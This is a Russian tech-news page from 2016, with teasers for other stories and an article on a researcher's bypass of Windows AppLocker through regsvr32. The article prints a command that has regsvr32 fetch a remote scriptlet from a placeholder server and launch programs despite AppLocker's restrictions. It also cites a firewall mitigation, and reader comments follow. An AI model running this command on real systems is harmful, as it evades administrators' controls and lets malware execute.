• Вековая мечта гениального математика воплощена 3D-принтером (3 фото + видео)

    В наши дни фантастика, о которой мы слышали или читали в детстве, воплощается в реальность. Много идей и разработок не были воплощены при жизни авторов – технические возможности были недостаточно в те годы. Новейшие же приборы и технологии помогают нам стряхивать пыль с отложенных на дальнюю полку проектов. Например, учёные из американск...
    Читать дальше
  • «Плоскоземелец» совершит полёт в самодельной ракете (3 фото + видео)

    61-летний Майк Хьюз, конструктор-ракетостроитель и бывший водитель лимузина, верит в плоскую Землю и не верит в достижения современной науки. Чтобы доказать свою веру в истинные формы планеты, энтузиаст задумал подняться в небо на собственноручно собранной ракете на высоту 550 метров над калифорнийской частью пустыни Мохаве, после чего дв...
    Читать дальше
  • Таинственный Galaxy X появился на официальном сайте Samsung

    На корейском официальном сайте Samsung появилась информация о таинственном Galaxy X. Гаджет прошел сертификацию, ему уже присвоен серийный номер SM-G888N0, и это значит, что устройство скоро выйдет на рынок.
    Читать дальше
  • Рентген-взгляд на популярные механизмы (35 фото + видео)

    Мы привыкли, что рентгеновские снимки обычно выполняются для проверки состояния здоровья, однако фотохудожник из Англии Ник Визи (Nick Veasey) применил рентгеновский аппарат для создания художественных образов различных механизмов, технических устройств, животных, растений и так далее. При этом демонстрируются многие детали, ранее скрытые...
    Читать дальше
  • Раковые клетки теперь могут уничтожаться рядовыми клетками

    Исследователи смогли перепрограммировать человеческие клетки на производство иммунных клеток нового типа. Они смогут выявлять и удалять онкологические образования. С помощью данной методики можно будет избавиться от побочных следствий лечения болезни.
    Читать дальше

Безопасность Windows оказалась под угрозой

27 апреля 2016 | Windows
Безопасность Windows оказалась под угрозой

В течение многих лет в бизнес-ориентированных версиях Windows присутствует функция AppLocker, которая позволяет администратору регулировать запуск тех или иных программ на компьютере. Например, можно запретить установку любых программ или запуск уже имеющихся приложений, которые не относятся к работе сотрудника. Это несомненно полезно для компаний, стремящихся защитить свою структуру от потенциально опасного ПО, однако исследователь Кейси Смит (Casey Smith) выяснил, что полностью доверять AppLocker не стоит, поскольку обнаруженная им уязвимость позволяет обходить ограничения администратора с помощью одной строки кода. Таким образом хакерам ничего не стоит взломать компьютеры и запустить вредоносное ПО.

Кейси Смит указал на инструмент Regsvr32, который можно использовать не по назначению для скачивания из интернета определенного XML-файла. Ввод команды вида regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll и скачивание файла, приведет к запуску cmd.exe, который можно заменить на любую другую программу, несмотря на установленные администратором ограничения в AppLocker. Атака не оставляет следов на жестком диске и в реестре, а в арсенале Microsoft пока не существует соответствующей «заплатки» для этой уязвимости. Описание ее Смит опубликовал на сервисе GitHub. Как вариант защиты рекомендуется отрезать Regsvr32 от интернета с помощью файервола.

Источник: engadget.com
Понравился пост? Просоединяйтесь к нам в Facebook!

Написать комментарий


Включите эту картинку для отображения кода безопасности
обновить, если не виден код


Комментарии: 5

avatar
27 апреля 2016 10:17 Hilo
Есть повод разработчикам заняться работой
+ 2
Ответить
avatar
27 апреля 2016 10:58 Гость_Xumepa
С админом можно и договориться об установке необходимого ПО
+ 0
Ответить
avatar
27 апреля 2016 11:30 Гость_M
В россии, за рубежом зарплата сисадминрстраторов достаточно высокая дабы не договорились
+ 0
Ответить
avatar
27 апреля 2016 12:08 WadymOS
Это что ж за админ такой, с которым можно договориться?
+ 0
Ответить
avatar
28 апреля 2016 11:41 zlodeu
Я например! )))
+ 3
Ответить
В Вашем браузере отключен JavaScript. Для корректной работы сайта настоятельно рекомендуется его включить.